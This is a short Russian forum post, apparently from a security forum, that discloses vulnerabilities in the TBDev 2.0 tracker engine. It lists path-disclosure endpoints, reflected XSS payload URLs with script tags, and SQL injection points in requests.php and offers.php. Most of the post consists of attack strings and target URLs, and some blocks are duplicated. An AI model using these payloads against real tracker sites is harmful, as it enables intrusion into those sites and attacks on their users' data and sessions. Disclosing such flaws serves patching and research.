0
Трекер-движок TBDev 2.0
1. Раскрытие пути
Цитата
confirm.php?id[]=
themes/TBDev/stdfoot.php
themes/TBDev/stdhead.php
themes/Gray/stdhead.php
delete.php
captcha.php
details.php?id[]=
Нужна авторизация:
thanks.php
votesview.php
takeedit.php
comment.php?action=quote&cid[]=
themes/TBDev/stdfoot.php
themes/TBDev/stdhead.php
themes/Gray/stdhead.php
delete.php
captcha.php
details.php?id[]=
Нужна авторизация:
thanks.php
votesview.php
takeedit.php
comment.php?action=quote&cid[]=
2. XSS
Цитата
_http://site/offcomment.php?action=<script>alert(/XSS/)</script>
_http://site/viewrequests.php?category=><script>alert(/XSS/)</script>
_http://site/viewrequests.php?category=><script>alert(/XSS/)</script>
3. SQL-Injection
Цитата
_http://site/requests.php?action=reset&requestid=sql'
POST:
_http://site/requests.php
action=edit&category=1&id=SQL
---
_http://site/offers.php
action=edit&id=SQL
POST:
_http://site/requests.php
action=edit&category=1&id=SQL
---
_http://site/offers.php
action=edit&id=SQL
©]]>https://forum.antichat.ru]]>
Наверх
